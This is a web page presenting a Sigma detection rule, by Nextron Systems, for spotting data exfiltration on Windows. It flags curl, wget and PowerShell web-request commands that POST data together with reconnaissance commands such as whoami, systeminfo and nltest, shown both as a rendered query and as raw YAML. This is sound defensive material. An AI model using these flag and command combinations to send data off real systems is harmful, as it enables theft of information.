EXPLORE
Sign In
← Back to Explore
sigmahighHunting

Potential Data Exfiltration Activity Via CommandLine Tools

Detects the use of various CLI utilities exfiltrating data via web requests

MITRE ATT&CK

T1059.001
execution

Detection Query

selection_iwr:
  Image|endswith:
    - \powershell_ise.exe
    - \powershell.exe
    - \pwsh.exe
    - \cmd.exe
  CommandLine|contains:
    - "curl "
    - Invoke-RestMethod
    - Invoke-WebRequest
    - "irm "
    - "iwr "
    - "wget "
  CommandLine|contains|all:
    - " -ur"
    - " -me"
    - " -b"
    - " POST "
selection_curl:
  Image|endswith: \curl.exe
  CommandLine|contains: --ur
selection_curl_data:
  CommandLine|contains:
    - " -d "
    - " --data "
selection_wget:
  Image|endswith: \wget.exe
  CommandLine|contains:
    - --post-data
    - --post-file
payloads:
  - CommandLine|re:
      - net\s+view
      - sc\s+query
  - CommandLine|contains:
      - Get-Content
      - GetBytes
      - hostname
      - ifconfig
      - ipconfig
      - netstat
      - nltest
      - qprocess
      - systeminfo
      - tasklist
      - ToBase64String
      - whoami
  - CommandLine|contains|all:
      - "type "
      - " > "
      - " C:\\"
condition: (selection_iwr or all of selection_curl* or selection_wget) and payloads

Author

Nasreddine Bencherchali (Nextron Systems)

Created

2022-08-02

Data Sources

windowsProcess Creation Events

Platforms

windows

References

Tags

attack.executionattack.t1059.001
Raw Content
title: Potential Data Exfiltration Activity Via CommandLine Tools
id: 7d1aaf3d-4304-425c-b7c3-162055e0b3ab
status: test
description: Detects the use of various CLI utilities exfiltrating data via web requests
references:
    - https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-08-02
modified: 2025-10-19
tags:
    - attack.execution
    - attack.t1059.001
logsource:
    category: process_creation
    product: windows
detection:
    selection_iwr:
        Image|endswith:
            - '\powershell_ise.exe'
            - '\powershell.exe'
            - '\pwsh.exe'
            - '\cmd.exe'
        CommandLine|contains:
            - 'curl '
            - 'Invoke-RestMethod'
            - 'Invoke-WebRequest'
            - 'irm '
            - 'iwr '
            - 'wget '
        CommandLine|contains|all:
            - ' -ur' # Shortest possible version of the -uri flag
            - ' -me' # Shortest possible version of the -method flag
            - ' -b'
            - ' POST '
    selection_curl:
        Image|endswith: '\curl.exe'
        CommandLine|contains: '--ur' # Shortest possible version of the --uri flag
    selection_curl_data:
        CommandLine|contains:
            - ' -d ' # Shortest possible version of the --data flag
            - ' --data '
    selection_wget:
        Image|endswith: '\wget.exe'
        CommandLine|contains:
            - '--post-data'
            - '--post-file'
    payloads:
        - CommandLine|re:
              - 'net\s+view'
              - 'sc\s+query'
        - CommandLine|contains:
              - 'Get-Content'
              - 'GetBytes'
              - 'hostname'
              - 'ifconfig'
              - 'ipconfig'
              - 'netstat'
              - 'nltest'
              - 'qprocess'
              - 'systeminfo'
              - 'tasklist'
              - 'ToBase64String'
              - 'whoami'
        - CommandLine|contains|all:
              - 'type '
              - ' > '
              - ' C:\'
    condition: (selection_iwr or all of selection_curl* or selection_wget) and payloads
falsepositives:
    - Unlikely
level: high